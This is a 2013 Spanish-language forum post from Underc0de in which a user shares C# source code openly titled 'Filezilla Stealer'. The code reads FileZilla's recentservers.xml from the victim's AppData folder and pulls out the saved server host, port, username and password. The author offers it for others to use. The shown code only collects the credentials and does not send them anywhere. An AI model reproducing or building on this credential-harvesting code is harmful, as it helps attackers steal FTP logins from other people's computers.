Underc0de

Programación General => C# - VB.NET => Mensaje iniciado por: Bloc en Agosto 11, 2013, 04:51:24 PM

Título: [C#] Filezilla Stealer by Bloc
Publicado por: Bloc en Agosto 11, 2013, 04:51:24 PM
Bueno debido a que visto otros filezillas stealer y me han parecido mas complejos, decidi reducir todo ese codigo y cree el mio que es mas entendible a mi parecer

Código (csharp) [Seleccionar]
namespace FileZillaStealer

{
    class FileZillaStealer
    {
        public void FileZillaStealer()
        {
            //Nombre: Filezilla Stealer
            //Autor: Bloc
            //Fecha Publicada: 11/08/2013
            //Requerimientos: Dejar la fuente.

            string DocumentoXml = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).ToString() + "\\Filezilla\\recentservers.xml";
            string StrHost;
            string StrPort;
            string StrUser;
            string StrPass;
            DataSet Ds = new DataSet();
            Ds.ReadXml(DocumentoXml);
            StrHost = Ds.Tables["Server"].Rows[0]["Host"].ToString();
            StrPort = Ds.Tables["Server"].Rows[0]["Port"].ToString();
            StrUser = Ds.Tables["Server"].Rows[0]["User"].ToString();
            StrPass = Ds.Tables["Server"].Rows[0]["Pass"].ToString();
        }
    }
}


Saludos y espero que les sirva